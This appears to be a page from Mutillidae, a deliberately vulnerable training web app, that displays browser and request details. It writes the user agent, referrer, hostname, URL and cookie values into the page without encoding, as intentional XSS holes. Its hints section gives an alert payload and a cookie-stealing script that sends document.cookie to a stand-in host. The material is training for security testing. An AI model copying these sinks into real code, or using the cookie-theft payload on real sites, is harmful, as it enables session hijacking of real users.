<center><h2><b>User agent string and other browser info</b></h2></center><p>
<B>Info obtained by PHP on the server:</B><P>
<TABLE cellpadding="5" width="65%" align="center">
<?php
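// Server-side view of the request. Every value printed here is supplied or
// influenced by the client (the headers entirely, the hostname through reverse
// DNS), and table_print() writes it into the page without HTML encoding. The
// hints section of this page names that reflection as its XSS exercise.
table_print("IP", $_SERVER['REMOTE_ADDR']);
// Resolve once and reuse the result; the lookup used to be performed twice
// with the first result discarded.
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
table_print("Hostname", $hostname);
table_print("Operating System", find_os());
// User-Agent and Referer are optional request headers: fall back to an empty
// string so a request without them does not raise an undefined-index notice.
table_print("Entire User Agent String", isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
table_print("Referrer", isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '');
table_print("Remote Client Port:", $_SERVER['REMOTE_PORT']);
# table_print ("WhoIs info for your IP:", "<small><pre>".WhoIs($_SERVER['REMOTE_ADDR'])."</pre></small>");
// $HTTP_COOKIE_VARS only exists on old PHP builds with long arrays enabled
// (the long arrays were removed in PHP 5.4). The guard keeps the old output
// where the array exists and avoids an undefined-variable warning elsewhere.
// The cookie value is client-controlled and is echoed without encoding.
if (isset($HTTP_COOKIE_VARS["TestCookie"])) {
    echo $HTTP_COOKIE_VARS["TestCookie"];
}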
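// Query the ARIN whois service for $DomainName and return the raw response.
//
// $DomainName is sent as given, followed by a newline; the only caller visible
// in this file (commented out) passes the client's IP address.
// Returns the response text, or an empty string when nothing was received.
// On connection failure the script stops with the socket error.
// The returned text comes from a remote server: HTML-encode it before placing
// it in a page.
function WhoIs($DomainName)
{ // This function by Andrew Pociu, small mods by Adrian Crenshaw
    // Open a TCP connection to whois.arin.net on the whois port (43).
    // The failure message now prints $ErrorNum/$ErrorStr, the variables that
    // fsockopen() actually fills in; $errno/$errstr were never set here.
    $Socket = fsockopen("whois.arin.net", 43, $ErrorNum, $ErrorStr) or die("$ErrorNum: $ErrorStr");
    fputs($Socket, $DomainName."\n");
    // Start from an empty string so the first append does not touch an
    // undefined variable.
    $WhoIsString = '';
    // Receive data from the whois server and collect it into one string
    while (!feof($Socket)) {
        $Line = fgets($Socket, 2048);
        if ($Line === false) {
            // Read failure or timeout: stop instead of looping on a stream
            // that never reports end-of-file.
            break;
        }
        $WhoIsString .= $Line;
    }
    // Close the stream and return the string
    fclose($Socket);
    return $WhoIsString;
}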
?>
</TABLE>
<B>Info obtained by JavaScript on the client:</B><P>
<script language="javascript" type="text/javascript">
<!--
// Client-side table: each JSTable_print() call below writes one row of
// navigator/screen/document data through document.write().
document.write('<TABLE cellpadding="5" width="65%" align="center">');
JSTable_print("Java Enabled",navigator.javaEnabled());
//JSTable_print("IP", java.net.InetAddress.getLocalHost().getHostAddress());
JSTable_print("Browser",navigator.appName);
JSTable_print("Browser Version",navigator.appVersion);
JSTable_print("Platform",navigator.platform);
// NOTE(review): cpuClass (and systemLanguage further down) are non-standard
// navigator properties; where a browser lacks them the row shows "undefined".
JSTable_print("CPU Class",navigator.cpuClass);
// tp remembers the last plugin name seen so consecutive repeats are skipped.
var tp="";
if (navigator.appName=="Netscape"){
// tdes is the row label; it is blanked after the first row so "Plugins"
// appears only once.
var tdes="Plugins";
// i is never declared, so it becomes an implicit global.
// NOTE(review): for...in may also visit non-index properties of the plugin
// collection, whose .name is not a plugin name - confirm in target browsers.
for (i in navigator.plugins)
{
if (tp!=navigator.plugins[i].name){
JSTable_print(tdes,navigator.plugins[i].name);
tdes="";
}
tp=navigator.plugins[i].name;
}
}
JSTable_print("System Language",navigator.systemLanguage);
JSTable_print("Resolution",screen.width+"x"+screen.height);
JSTable_print("Color Depth",screen.colorDepth);
// The referrer and the page URL are chosen by whoever links a visitor here,
// and JSTable_print() concatenates them into markup without encoding, so these
// two rows are DOM-based XSS sinks. unescape() percent-decodes the URL before
// it is written. Outside a training target, insert such values as text nodes
// (textContent) instead of passing them to document.write().
JSTable_print("Referrer",document.referrer);
JSTable_print("URL",unescape(document.location));
document.write("</TABLE>");
// Write one two-column table row into the document: a coloured label cell
// followed by a value cell.
// Both arguments are concatenated into the markup as they are, with no HTML
// encoding; any markup in `value` or `description` becomes part of the page.
function JSTable_print(description,value)
{
    var labelCell = '<TD><FONT color="#990099">' + description + '</FONT></TD>';
    var valueCell = '<TD>' + value + '</TD>';
    document.write('<TR>' + labelCell + valueCell + '</TR>');
}
// -->
</script>
<?php //PHP Functions
// Emit one two-column table row: a coloured label cell and a value cell.
//
// $description and $value are written into the markup exactly as received.
// The callers in this file pass request data (User-Agent, Referer, client
// address), so this is the reflection point the page's hints section refers
// to. Outside a training target, encode both arguments here with
// htmlspecialchars($s, ENT_QUOTES, 'UTF-8') before output.
function table_print($description, $value)
{
    $labelCell = '<TD valign="top"><FONT color="#990099">' . $description . '</FONT></TD>';
    $valueCell = '<TD>' . $value . '</TD>';
    echo '<TR>', $labelCell, $valueCell, '</TR>';
}
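// Return the third "; "-separated field of the User-Agent header, or null when
// the header is absent or has fewer than three fields.
//
// That position holds the operating system only for agent strings shaped like
// "Mozilla/5.0 (X11; U; Linux x86_64; ...)"; for any other layout the field is
// whatever the client put there. The value is raw client-supplied text and is
// returned without encoding.
function find_os()
{
    // The header is optional: treat a missing one as an empty string.
    $userAgent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    $browserarray = explode("; ", $userAgent);
    // Short agent strings have no index 2; return null without a warning.
    return isset($browserarray[2]) ? $browserarray[2] : null;
}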
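// Pick the browser field out of the User-Agent header.
//
// The header is split on "; ". When the second field is exactly "U" the fifth
// field is returned, otherwise the second field is. Returns null when the
// header is absent or too short to contain the chosen field. The value is raw
// client-supplied text and is returned without encoding.
function find_browser()
{
    // The header is optional: treat a missing one as an empty string.
    $userAgent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    $browserarray = explode("; ", $userAgent);
    $index = (isset($browserarray[1]) && $browserarray[1] === "U") ? 4 : 1;
    // Short agent strings may lack the chosen index; return null without a warning.
    return isset($browserarray[$index]) ? $browserarray[$index] : null;
}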
?>
<?php
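// Begin hints section
// The hint box is shown only when the client sends the cookie showhints=1.
// isset() keeps a request without that cookie from raising an undefined-index
// notice; the loose == 1 comparison is kept so the accepted values stay the same.
if (isset($_COOKIE["showhints"]) && $_COOKIE["showhints"]==1) {
    // The sample snippets are entity-encoded (&lt; / &gt;) so the browser
    // displays them as text. As raw script tags inside this echoed markup they
    // ran in the browser of whoever opened the hints instead of being shown.
    echo '<p><span style="background-color: #FFFF00">
<b>For XSS:</b>This implementation is purely a reflected XSS attack,
however it may show up in an admin\'s logs when they go to check out what
sort of browser their viewers are using. That should be a big hint for how
to attack this app. "&lt;script&gt;alert("XSS");&lt;/script&gt;" is the classic, but
there are far more interesting things you could do which I plan show in a video later.
For some hot cookie stealing action, try something like:
<pre>
&lt;script&gt;
new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie);
&lt;/script&gt;
</pre>
Also, check out <a href="http://ha.ckers.org/xss.html">Rsnake\'s XSS Cheat Sheet</a>
for more ways you can encode XSS attacks that may allow you to get around some filters.
<br><br>
</span>';
}
// End hints section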
?>